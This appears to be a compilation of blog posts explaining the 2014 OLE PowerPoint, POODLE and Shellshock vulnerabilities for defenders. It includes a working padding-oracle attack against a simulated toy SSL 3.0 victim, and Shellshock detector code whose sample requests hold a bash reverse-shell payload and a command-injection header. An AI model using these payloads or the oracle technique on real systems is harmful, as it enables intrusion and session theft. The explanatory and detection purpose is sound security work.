(CVE-2014-6352) Zero-day vulnerability found in OLE PowerPoint

Object Linking and Embedding (OLE) is nothing new, and it is not even a week since the last OLE vulnerability (CVE-2014-4114) was disclosed by iSIGHT Partners, who unveiled a cyber-espionage campaign attributed to the Russian hacking group labelled “Sandworm” that was successfully targeting Windows from Vista SP2 upwards. That has not stopped the newest member of the family coming to light, this time using Microsoft PowerPoint as the attack vector.

CVE-2014-6352 is on a phishing trip, and once again the age-old security awareness wisdom applies: don’t open the attachment you weren’t expecting. If you receive an email with a PowerPoint file, or anything else for that matter, that you did not expect, DO NOT, I REPEAT, DO NOT open it, as you may be on the fast track to infecting yourself with a zero-day flaw that is being actively exploited in the wild.

The Microsoft advisory states:

“In a web-based attack scenario, an attacker would have to host a website that contains a specially crafted Microsoft Office file, such as a PowerPoint file, that is used in an attempt to exploit this vulnerability. In addition, compromised websites (and websites that accept or host user-provided content) could contain specially crafted content that could exploit this vulnerability. An attacker would have no method to force users to visit a malicious website. Instead, an attacker would have to persuade the targeted user to visit the website, typically by getting them to click a hyperlink that directs a web browser to the attacker-controlled website.”

OLE is a tried and tested attack vector and has proven very successful when combined with social engineering techniques; let’s face it, if people keep clicking on things they shouldn’t, this will continue into the future.

One thought I had while writing this: a bad actor who has already compromised a standard user’s system but is having difficulty gaining administrative privileges, and who knows the admins open certain documents on a server every so often, would only have to modify one of those files (assuming the compromised account can write to it) and wait. Once an admin opens it, they are in and access has been granted, so to speak. I know there are many other methods that would work before this, but it is an interesting attack vector nonetheless.

Keep your poodle on a leash! (CVE-2014-3566)

Yet another critical vulnerability (CVE-2014-3566) exists in something we use every day, and much like the other serious vulnerabilities discovered recently, this one potentially affects around 97% of the internet.

[image: SSLv3 pie chart]

SSL 3.0 improved upon SSL 2.0 by adding SHA-1 based ciphers and support for certificate authentication; it was created because serious security flaws had been found in the previous version, and so v3.0 was born. TLS 1.0 took over in 1999, but you should really be using at least TLS 1.1 or 1.2 because, let’s face it, they were created for a reason, right? Nobody creates a new version of anything for the fun of it, especially when it is used by a large part of the internet.

Padding oracle attacks are nothing new, though: the French cryptographer Serge Vaudenay published the technique back in 2002, and in 2010 Juliano Rizzo and Thai Duong applied it successfully against several web application frameworks.

What is an oracle attack though? Well, “an oracle attack is an attack that exploits the availability of a weakness in the system which can be used as an “oracle” which can give a simple go/no go indication to show whether the attacker has reached, or is nearing, their goal. The attacker can then combine the oracle with systematic search of the problem space to complete their attack.”

Ok but what is an oracle? Well “an oracle is a mechanism used by software testers and software engineers for determining whether a test has passed or failed. It is used by comparing the output(s) of the system under test, for a given test case input, to the outputs that the oracle determines that product should have. The term was first used and defined in William Howden’s Introduction to the Theory of Testing.”

Now that we know what a padding oracle attack is, we have pieced together part of the POODLE acronym: it stands for “Padding Oracle On Downgraded Legacy Encryption” and it was discovered by researchers at Google (Bodo Möller, Thai Duong and Krzysztof Kotowicz).

Ok, how does this look in a diagram? Glad you asked, as I put together a little flowchart below which you may find interesting. Bear in mind that this is a protocol flaw in SSL 3.0 itself, not an implementation issue, so patching a library does not make it go away; only disabling SSL 3.0 does.

[image: CBC (Cipher Block Chaining) breakdown flowchart]

What you are looking at in the above flowchart is a lot simpler than it looks: it is Cipher Block Chaining (CBC), a block cipher mode of operation. “In cryptography a mode of operation is an algorithm that uses a block cipher to provide an information service such as confidentiality or authenticity.”

[image: cipher close-up]

Pretty much, your plaintext is split into blocks of the cipher’s block size and padded where necessary to fill the last block. The first block is combined with an initialization vector (IV), think of this as a starting variable (SV) that randomises the encryption process, using exclusive-OR (XOR), and then encrypted with the key. Every following plaintext block is XORed with the previous block of ciphertext before being encrypted with the same key, so each ciphertext block depends on everything that came before it. Decryption runs in reverse: each ciphertext block is decrypted and then XORed with the previous ciphertext block (or the IV for the first one). The POODLE problem is that SSL 3.0 only checks the last byte of the padding, the length, and never the padding bytes themselves, so a tampered final block is accepted whenever that one byte happens to come out right, and that accept/reject signal is the attacker’s oracle.

CBC is still widely used today, as you have now discovered with POODLE, and tools are sure to be released in the coming days, much like for the BEAST (Browser Exploit Against SSL/TLS) and CRIME attacks. BEAST, like POODLE, was co-discovered by Thai Duong, together with Juliano Rizzo, and was demonstrated on September 23, 2011.
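To make the mechanism concrete, here is an added example (my own toy code, not from the original post nor from the POODLE paper) that implements CBC with SSL 3.0-style padding and then mounts the padding-oracle attack against it. A small SHA-256-based Feistel network stands in for the real block cipher, an 8-byte tag stands in for the real MAC, and the “browser” simply re-sends a made-up cookie with attacker-chosen padding around it; those are all assumptions for the example. What it shows is the part the flowchart cannot: why swapping a ciphertext block into the padding slot is accepted once in 256 tries, and how that one accept leaks a plaintext byte.

```python
import hashlib
import hmac
import random

BLOCK = 8     # block size in bytes (assumed: 64-bit toy cipher, like 3DES)
MAC_LEN = 8   # truncated HMAC tag, assumed for brevity

def _f(half, key, rnd): return hashlib.sha256(key + bytes([rnd]) + half).digest()[:4]

def _feistel(key, block, rounds):
    """Toy 8-round Feistel block cipher; stands in for 3DES/AES."""
    l, r = block[:4], block[4:]
    for rnd in rounds:
        l, r = r, bytes(a ^ b for a, b in zip(l, _f(r, key, rnd)))
    return r + l  # final swap: decryption is the same loop with rounds reversed

def block_encrypt(key, block): return _feistel(key, block, range(8))
def block_decrypt(key, block): return _feistel(key, block, reversed(range(8)))
def xor(a, b): return bytes(x ^ y for x, y in zip(a, b))
def _rand(rng, n): return bytes(rng.randrange(256) for _ in range(n))

def cbc_encrypt(key, iv, data):
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        prev = block_encrypt(key, xor(data[i:i + BLOCK], prev))  # C_i = E(P_i ^ C_{i-1})
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key, iv, data):
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        cur = data[i:i + BLOCK]
        out.append(xor(block_decrypt(key, cur), prev))  # P_i = D(C_i) ^ C_{i-1}
        prev = cur
    return b"".join(out)

def ssl3_seal(key, mac_key, iv, plaintext, rng):
    """SSL 3.0 record: plaintext || MAC || padding, CBC-encrypted. Padding bytes
    are unspecified by the protocol (random here); only the final length byte matters."""
    mac = hmac.new(mac_key, plaintext, hashlib.sha256).digest()[:MAC_LEN]
    body = plaintext + mac
    pad_len = (BLOCK - 1) - len(body) % BLOCK
    return cbc_encrypt(key, iv, body + _rand(rng, pad_len) + bytes([pad_len]))

def ssl3_open(key, mac_key, iv, record):
    """True iff the receiver accepts the record. The protocol flaw: only the length
    byte is checked, so a whole tampered final block passes 1 time in 256."""
    pt = cbc_decrypt(key, iv, record)
    pad_len = pt[-1]
    if pad_len >= BLOCK:
        return False
    body = pt[:len(pt) - pad_len - 1]
    if len(body) < MAC_LEN:
        return False
    data, mac = body[:-MAC_LEN], body[-MAC_LEN:]
    return hmac.compare_digest(mac, hmac.new(mac_key, data, hashlib.sha256).digest()[:MAC_LEN])

class Victim:
    """Browser and server sharing session keys. The attacker's script makes the browser
    resend the secret cookie with chosen padding around it; every record gets a fresh IV."""
    def __init__(self, secret, rng):
        self.secret, self.rng = secret, rng
        self.key, self.mac_key = _rand(rng, 16), _rand(rng, 16)
    def request(self, prefix_len, suffix_len):
        iv = _rand(self.rng, BLOCK)
        pt = b"A" * prefix_len + self.secret + b"B" * suffix_len
        return iv, ssl3_seal(self.key, self.mac_key, iv, pt, self.rng)
    def server_accepts(self, iv, record):
        return ssl3_open(self.key, self.mac_key, iv, record)

def poodle_recover(victim, secret_len, max_tries=100_000):
    """Recover the secret one byte per ~256 requests using the padding oracle."""
    secret = bytearray()
    for k in range(secret_len):
        prefix_len = (BLOCK - 1 - k) % BLOCK                       # secret[k] ends block t
        t = (prefix_len + k) // BLOCK
        suffix_len = -(prefix_len + secret_len + MAC_LEN) % BLOCK  # last block = all padding
        for _ in range(max_tries):
            iv, rec = victim.request(prefix_len, suffix_len)
            blocks = [rec[i:i + BLOCK] for i in range(0, len(rec), BLOCK)]
            forged = b"".join(blocks[:-1]) + blocks[t]  # swap C_t into the padding slot
            if victim.server_accepts(iv, forged):
                # Accepted => D(C_t)[-1] ^ C_{n-2}[-1] == BLOCK-1,
                # and P_t[-1] = D(C_t)[-1] ^ C_{t-1}[-1]  (C_{-1} is the IV).
                prev_t = iv if t == 0 else blocks[t - 1]
                secret.append((BLOCK - 1) ^ blocks[-2][-1] ^ prev_t[-1])
                break
        else:
            raise RuntimeError("oracle never accepted; raise max_tries")
    return bytes(secret)

def demo(seed=2014):
    """Constructed scenario: recover a 10-byte session cookie. Returns (secret, recovered)."""
    rng = random.Random(seed)
    victim = Victim(b"sid=4f2a9c", rng)
    return victim.secret, poodle_recover(victim, len(victim.secret))
```

Calling demo() recovers the whole cookie at a cost of roughly 256 requests per byte, the same budget the real attack needs. Note that the receiver in ssl3_open does exactly what SSL 3.0 tells it to do; there is no bug to patch, which is why the only fix is to stop speaking SSL 3.0.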

How do I protect myself from a POODLE attack?

Don’t connect to a Wi-Fi hotspot that you are not in control of, as a man-in-the-middle position such as a rogue hotspot is where the attack is most likely to be mounted at the time of writing. Even if your browser negotiates TLS, an attacker who interferes with the handshake can make it retry with SSL 3.0 as a fallback, so that could still be your fallback. The real fix is to disable SSL 3.0 in your browser and on your servers; the TLS_FALLBACK_SCSV signalling cipher suite, which browsers and OpenSSL were adding at the time, stops the downgrade itself.

How can I detect it?

Use an Intrusion Detection System (IDS); signatures already exist to detect SSL 3.0 handshakes and downgrade attempts on your network. On the server side, check whether your own services still accept an SSL 3.0 handshake and turn it off if they do.

References:

“Padding oracle attack.” Wikipedia, the free encyclopedia. Retrieved 16 Oct. 2014. <http://en.wikipedia.org/wiki/Padding_oracle_attack>

“Oracle (software testing).” Wikipedia, the free encyclopedia. Retrieved 16 Oct. 2014. <http://en.wikipedia.org/wiki/Oracle_(software_testing)>

“Block cipher mode of operation.” Wikipedia, the free encyclopedia. Retrieved 16 Oct. 2014. <http://en.wikipedia.org/wiki/Block_cipher_mode_of_operation>

Bash vulnerability (CVE-2014-6271) “Shellshock” Analysis with Wireshark

[image: ShellShock]

What is with all these new fun and exciting vulnerabilities we have encountered recently, like Heartbleed and ShellShock?

Both of these are a very big deal for anyone in IT, whether you are in a general admin role or an IT security position. In most cases it will be up to system administrators and software vendors to issue and apply patches.

Both have existed for years and remained unnoticed, or have they? Someone has surely noticed these before they were made public and abused them to gain access to systems, and that does not just mean government actors, who are known to hoard the vulnerabilities they find, but criminal threat actors too, out to infiltrate as much as they possibly can, casting the widest net they can and ultimately becoming an Advanced Persistent Threat (APT).

Regarding the name ShellShock, it seems to have originated from a Twitter exchange between Andreas Lindh and Robert Graham; the image above is also Andreas’s creation and is quite a cool image at that, one which grabs your attention. The researcher who discovered the bug, however, was Stéphane Chazelas.

In my short video, which you can see below, I show you how easy it actually is to exploit this vulnerability, which has many different attack vectors: Linux, OS X, DHCP clients, SSH (OpenSSH), OpenVPN, Apache with CGI, embedded devices, rooted phones, SCADA systems powering our infrastructure, the list goes on; and if you are using Windows with Cygwin installed, you may also be vulnerable.

Looking at one of these vectors, breaking down this vulnerability in an Apache environment (which requires mod_cgi to be enabled, because that is what passes request headers such as User-Agent to the script as environment variables, where a vulnerable bash parses them) is quite simple for the threat actor who has found a CGI script on your server, possibly by using curl to see what the server returns and which headers it accepts.

[screenshot omitted]

Now if we look at the output of the CGI file we just created, you will see something similar to the following:

[screenshot: output of the CGI script]

Next the attacker connects to your Apache server using curl, with curl’s handy User-Agent option, while netcat listens on the attacking machine:

Netcat listening on port 4444:

[screenshot: netcat listening on port 4444]

curl sending a User-Agent header that carries the bash function definition followed by a reverse TCP shell, against the target machine running the vulnerable bash:

[screenshot: curl command with the malicious User-Agent header]

Success looks like the following:

[screenshot: reverse shell received on the attacking machine]

Looking at the initial curl request a bit closer in the packet capture, we can see that the host accepted our connection and that the User-Agent header contains the reverse shell back to the attacking machine:

[screenshot: packet capture of the curl request with the User-Agent payload]
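As an added example that is not part of the original post (the blog’s own commands live in the screenshots above), here is a Python script that does two of the things a defender wants after seeing that capture: parse raw HTTP requests as Wireshark’s Follow TCP Stream shows them and flag any header carrying the `() {` function-definition marker that the IDS signatures key on, and run the classic local check for a vulnerable bash. The sample requests, addresses, paths and script name are constructed for the example.

```python
import os
import re
import shutil
import subprocess

# Marker a vulnerable bash treated as the start of a function definition, allowing
# the whitespace variants attackers used ("() {:;};", "() { :; };"); everything
# after the closing "};" is the command bash would run while importing the variable.
SHELLSHOCK_RE = re.compile(rb"\(\)\s*\{[^}]*\}\s*;\s*(?P<cmd>.*)")
HEADER_RE = re.compile(rb"^(?P<name>[A-Za-z0-9-]+):[ \t]*(?P<value>.*)$")

def parse_request(raw):
    """Split a raw HTTP request (what Follow TCP Stream shows) into the request
    line and (header, value) pairs; the body is ignored."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    headers = [(m.group("name"), m.group("value"))
               for m in map(HEADER_RE.match, lines[1:]) if m]
    return lines[0], headers

def cgi_env_name(header):
    """Environment variable mod_cgi exports for a request header (RFC 3875):
    User-Agent -> HTTP_USER_AGENT. This is how the payload reaches bash."""
    name = header.decode().upper().replace("-", "_")
    return name if name in ("CONTENT_TYPE", "CONTENT_LENGTH") else "HTTP_" + name

def find_shellshock(raw):
    """Return [(env var name, injected command)] for every header a vulnerable
    bash would have executed; an empty list means the request looks clean."""
    _, headers = parse_request(raw)
    hits = []
    for name, value in headers:
        m = SHELLSHOCK_RE.search(value)
        if m:
            hits.append((cgi_env_name(name), m.group("cmd").decode(errors="replace").strip()))
    return hits

def bash_is_vulnerable(bash="bash"):
    """Classic local check: export a variable whose value is a function definition
    with a trailing command, then start bash. A vulnerable bash prints 'vulnerable'
    while importing the variable; a patched one does not."""
    if shutil.which(bash) is None:
        raise FileNotFoundError(bash)
    env = {"PATH": os.environ.get("PATH", "/usr/bin:/bin"), "x": "() { :;}; echo vulnerable"}
    out = subprocess.run([bash, "-c", "echo test"], env=env, capture_output=True, text=True).stdout
    return "vulnerable" in out

# Constructed sample traffic (not from the blog's capture; addresses and paths are
# made up): one clean request and two Shellshock attempts.
CLEAN_REQUEST = (
    b"GET /cgi-bin/status.sh HTTP/1.1\r\n"
    b"Host: 10.0.0.9\r\n"
    b"User-Agent: curl/7.35.0\r\n\r\n"
)
REVERSE_SHELL_REQUEST = (
    b"GET /cgi-bin/status.sh HTTP/1.1\r\n"
    b"Host: 10.0.0.9\r\n"
    b"User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/10.0.0.5/4444 0>&1\r\n"
    b"Accept: */*\r\n\r\n"
)
VARIANT_REQUEST = (
    b"GET /cgi-bin/status.sh HTTP/1.1\r\n"
    b"Host: 10.0.0.9\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Referer: () {:;}; /usr/bin/id > /tmp/x\r\n\r\n"
)

if __name__ == "__main__":
    for req in (CLEAN_REQUEST, REVERSE_SHELL_REQUEST, VARIANT_REQUEST):
        print(find_shellshock(req))
```

The detector deliberately looks at every header, not just User-Agent: mod_cgi exports all of them, so Referer, Cookie or a custom header works just as well for the attacker, and a signature that only inspects User-Agent misses the variant request above.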

On the 7th of October, Malware Must Die posted on their blog about the threat known as “Mayhem”, in which the white-hat security research workgroup performs a detailed analysis of the infection and warns that we have not seen the final wave of this bash vulnerability yet.

What have we learned from this vulnerability? Maybe that we should not take for granted that we are secure, and that the best form of defence is a layered approach which incorporates network forensics, so that you can look back in time and see what happened in the event of a breach.

I know for a fact that some people out there would not have known their systems had been hit had they not been able to go back a few days or months, simply and quickly, and produce a report to pass on to their security team to investigate, with all the detail required to hand to the authorities if needed.

Sniff your traffic, understand the packets.